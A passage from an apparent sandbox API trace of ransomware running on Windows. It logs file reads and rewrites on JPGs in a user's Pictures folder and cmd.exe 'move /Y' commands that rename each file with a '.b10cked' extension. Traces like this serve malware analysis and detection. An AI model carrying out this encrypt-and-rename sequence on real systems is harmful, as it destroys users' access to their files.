cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0144.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qgVefxhoS8T3s19q574.jpg", cchWideChar=23, lpMultiByteStr=0x13288fc, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qgVefxhoS8T3s19q574.jpg", lpUsedDefaultChar=0x0) returned 23 [0144.549] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x383a [0144.549] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0144.549] CloseHandle (hObject=0x114) returned 1 [0144.550] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\qgVefxhoS8T3s19q574.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG") returned 0x38 [0144.551] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\") returned 0x2c [0144.551] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x828, dwThreadId=0x7ec)) returned 1 [0144.552] CloseHandle (hObject=0x110) returned 1 [0144.552] CloseHandle (hObject=0x114) returned 1 [0144.552] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", cchLength=0x3a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\") returned 0x3a [0144.552] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", cchLength=0x3a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\") returned 0x3a [0144.552] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\", cchCount1=58, lpString2="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\", cchCount2=58) returned 2 [0144.552] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.552] ReleaseMutex (hMutex=0xf8) returned 1 [0144.552] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.553] ReleaseMutex (hMutex=0xf8) returned 1 [0144.553] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.553] ReleaseMutex (hMutex=0xf8) returned 1 [0144.553] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.553] ReleaseMutex (hMutex=0xf8) returned 1 [0144.553] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\u8sH0rXco9.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2rewelj\\j4m1cx oc5jpl3u0yc\\u8sh0rxco9.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0144.553] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.553] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbc6a [0144.553] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.553] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20134352079) returned 1 [0144.554] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.554] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbc6a [0144.554] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.554] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbc6a [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xbc6a [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbc6a [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbc6a [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbc6a [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbc6a [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbc6a [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.555] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbc6a [0144.556] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.556] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xb782 [0144.556] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0144.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0144.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0144.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xbc6a [0144.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0144.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0144.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0144.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xbc6a [0144.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0144.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0144.557] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5e34, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5e34, lpOverlapped=0x0) returned 1 [0144.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0144.557] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5e34, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5e34, lpOverlapped=0x0) returned 1 [0144.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=-24116, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5e36 [0144.557] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5e34, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5e34, lpOverlapped=0x0) returned 1 [0144.558] SetFilePointer (in: hFile=0x114, lDistanceToMove=-24116, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5e36 [0144.558] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5e34, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5e34, lpOverlapped=0x0) returned 1 [0144.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="u8sH0rXco9.jpg", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="u8sH0rXco9.jpg", cchWideChar=14, lpMultiByteStr=0x131326c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u8sH0rXco9.jpg", lpUsedDefaultChar=0x0) returned 14 [0144.562] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xbc6a [0144.562] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0144.562] CloseHandle (hObject=0x114) returned 1 [0144.563] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\u8sH0rXco9.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG") returned 0x38 [0144.563] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\") returned 0x2c [0144.564] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x88c, dwThreadId=0x9cc)) returned 1 [0144.599] CloseHandle (hObject=0x110) returned 1 [0144.599] CloseHandle (hObject=0x114) returned 1 [0144.599] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", cchLength=0x3a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\") returned 0x3a [0144.599] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\", cchLength=0x3a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\") returned 0x3a [0144.599] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\", cchCount1=58, lpString2="C:\\USERS\\EEBSYM5\\PICTURES\\LR0AR2REWELJ\\J4M1CX OC5JPL3U0YC\\", cchCount2=58) returned 2 [0144.599] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.599] ReleaseMutex (hMutex=0xf8) returned 1 [0144.599] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.599] ReleaseMutex (hMutex=0xf8) returned 1 [0144.599] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.599] ReleaseMutex (hMutex=0xf8) returned 1 [0144.599] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0144.599] ReleaseMutex (hMutex=0xf8) returned 1 [0144.599] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\QO_v_Iwy7B17SYlN-.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2rewelj\\qo_v_iwy7b17syln-.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0144.599] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.599] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd410 [0144.599] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.599] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20138850032) returned 1 [0144.599] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.599] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd410 [0144.599] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.599] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.599] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd410 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xd410 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd410 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd410 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd410 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd410 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd410 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd410 [0144.600] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0144.601] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xcf28 [0144.601] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0144.601] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0144.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0144.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xd410 [0144.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0144.602] SetFilePointer (in: 